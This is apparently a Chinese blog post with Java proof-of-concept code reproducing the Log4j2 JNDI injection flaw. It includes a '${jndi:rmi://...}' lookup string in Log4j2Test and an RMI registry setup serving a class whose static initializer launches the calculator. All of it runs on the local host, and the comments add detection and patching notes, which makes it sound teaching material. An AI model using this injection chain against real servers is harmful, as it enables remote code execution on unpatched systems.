Log4j2漏洞代碼復現
代碼如下:
package poc;
import java.io.Serializable;
import java.rmi.Remote;
/**
 * Demo class whose static initializer opens the operating system's calculator.
 *
 * <p>The calculator is only a visible marker: the side effect sits in a static
 * initializer, so it fires as soon as the JVM initializes this class, before any
 * constructor or method is called. In this demo the class is named by the JNDI
 * {@code Reference} that {@code RmiService} binds, and it is also bound directly
 * as a serializable object.
 *
 * <p>Detection note: a Java process that unexpectedly starts a child process
 * (here {@code calc} or {@code open}) is the observable symptom to alert on.
 */
public class CalcTest implements Remote, Serializable {
    // Label printed by show(); set once by the constructor.
    private String name;

    static {
        try {
            System.err.println("遠程代碼開始執行了...");
            String osName = System.getProperty("os.name");
            System.err.println(osName);

            // Pick the calculator command for the current platform; other platforms run nothing.
            String[] commands = null;
            if (osName.startsWith("Mac OS")) {
                commands = new String[] {"open", "/System/Applications/Calculator.app"};
            } else if (osName.startsWith("Windows")) {
                commands = new String[] {"calc"};
            }
            if (commands != null) {
                Runtime.getRuntime().exec(commands);
            }
            System.err.println("遠程代碼被執行了...");
        } catch (Exception e) {
            // Failures are only reported; class initialization still completes.
            e.printStackTrace();
        }
        System.out.println("Hack_code執行了....");
    }

    /**
     * Creates an instance carrying the given label.
     *
     * @param name label printed by {@link #show()}
     */
    public CalcTest(String name) {
        this.name = name;
    }

    /**
     * Prints the label followed by a fixed message.
     *
     * @return the constant string {@code "Result"}
     */
    public String show() {
        System.out.println(name + "遠程呼叫執行");
        return "Result";
    }
}
package poc;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
/**
 * Logs one string that contains a JNDI lookup expression, standing in for
 * attacker-controlled input such as a user name.
 *
 * <p>On a Log4j2 release that still resolves lookups inside message text,
 * formatting this message makes the JVM query the RMI registry at
 * 127.0.0.1:1099 for the name "hack". A fixed release prints the text unchanged.
 *
 * <p>Defender notes: upgrading Log4j2 is the fix, and filtering input strings
 * alone is not a reliable substitute. The literal "${jndi:" in logged request
 * fields is the pattern to search for when reviewing logs.
 */
public class Log4j2Test {
    private static final Logger LOGGER = LogManager.getLogger(Log4j2Test.class);

    /**
     * Writes the lookup string at ERROR level.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Stand-in for a value that arrived from an untrusted source.
        String untrustedValue = "${jndi:rmi://127.0.0.1:1099/hack}";
        LOGGER.error(untrustedValue);
    }
}
package poc;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.util.concurrent.CountDownLatch;
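/**
 * Starts the RMI registry that the other classes in this demo bind to and look up from.
 */
public class RegisterService1099 {
    /**
     * Creates an RMI registry on port 1099 and keeps the process alive.
     *
     * <p>If the registry cannot be created (for example because the port is
     * already in use), the error is reported and the method returns instead of
     * blocking forever with no registry running.
     *
     * @param args unused
     * @throws InterruptedException if the main thread is interrupted while parked
     */
    public static void main(String[] args) throws InterruptedException {
        try {
            // The registry listens on port 1099.
            // NOTE(review): createRegistry(int) uses the default socket factories, so the
            // listener is presumably not restricted to loopback — confirm host firewalling
            // before running the demo.
            LocateRegistry.createRegistry(1099);
        } catch (RemoteException e) {
            e.printStackTrace();
            // Nothing to keep alive without a registry; exit rather than hang silently.
            return;
        }
        // Park the main thread; otherwise the application would exit.
        CountDownLatch keepAlive = new CountDownLatch(1);
        keepAlive.await();
    }
}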
package poc;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
 * Looks up the object bound as "calc" in the local RMI registry and calls
 * {@code show()} on it.
 *
 * <p>NOTE(review): {@code CalcTest} is serializable and no export call is
 * visible in this file, so the lookup presumably returns a deserialized copy
 * and {@code show()} runs in this JVM rather than remotely. Confirm before
 * relying on the "remote call" wording in the output.
 */
public class RmiClient {
    /**
     * Performs the lookup and prints the value returned by {@code show()}.
     *
     * @param args unused
     * @throws RemoteException if communication with the registry fails
     * @throws NotBoundException if nothing is bound under "calc"
     */
    public static void main(String[] args) throws RemoteException, NotBoundException {
        // Obtain a reference to the registry on the local host.
        Registry localRegistry = LocateRegistry.getRegistry("127.0.0.1", 1099);

        // Fetch whatever is bound under "calc" and treat it as a CalcTest.
        Object bound = localRegistry.lookup("calc");
        CalcTest calc = (CalcTest) bound;

        // Call the method first, then print its return value.
        String result = calc.show();
        System.out.println("Client:呼叫遠程方法:" + result);
    }
}
package poc;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
 * Binds two names in the local RMI registry: "hack", a wrapped JNDI
 * {@code Reference} naming {@code poc.CalcTest}, and "calc", a
 * {@code CalcTest} instance.
 *
 * <p>Defender note: whether a JVM honours a remote factory location in a
 * reference received over RMI is governed by the JDK system property
 * {@code com.sun.jndi.rmi.object.trustURLCodebase}. Current JDKs are understood
 * to leave it disabled by default, so verify it is not enabled in production.
 */
public class RmiService {
    /**
     * Registers both bindings and prints a confirmation line.
     *
     * @param args unused
     * @throws RemoteException if communication with the registry fails
     * @throws NamingException if the reference wrapper cannot be created
     * @throws AlreadyBoundException if "hack" or "calc" is already bound
     */
    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        // Obtain the registry on the local host.
        Registry localRegistry = LocateRegistry.getRegistry("127.0.0.1", 1099);

        // Author's note: when the last argument (the factory location) is left unset, the
        // class is created in the local JVM; when it is set, creation is done against the
        // specified server. It is null here, so only the local classpath is involved.
        Reference calcReference = new Reference("poc.CalcTest", "poc.CalcTest", null);
        localRegistry.bind("hack", new ReferenceWrapper(calcReference));

        // This binding hands out the object itself rather than a reference to it.
        localRegistry.bind("calc", new CalcTest("RmiService"));

        System.out.println("CalcTestService已經注冊");
    }
}
注意:先運行RegisterService1099,再運行RmiService,最後運行客戶端(RmiClient)或者Log4j2Test。復現需要仍會決議訊息中 ${jndi:...} 查找的Log4j2版本;升級到已修復的Log4j2版本後,這條日誌只會被當作普通字串輸出。
本人也是參考了bilibili的視頻所寫,有問題一起交流,謝謝!
參考:https://www.jianshu.com/p/de85fad05dcb
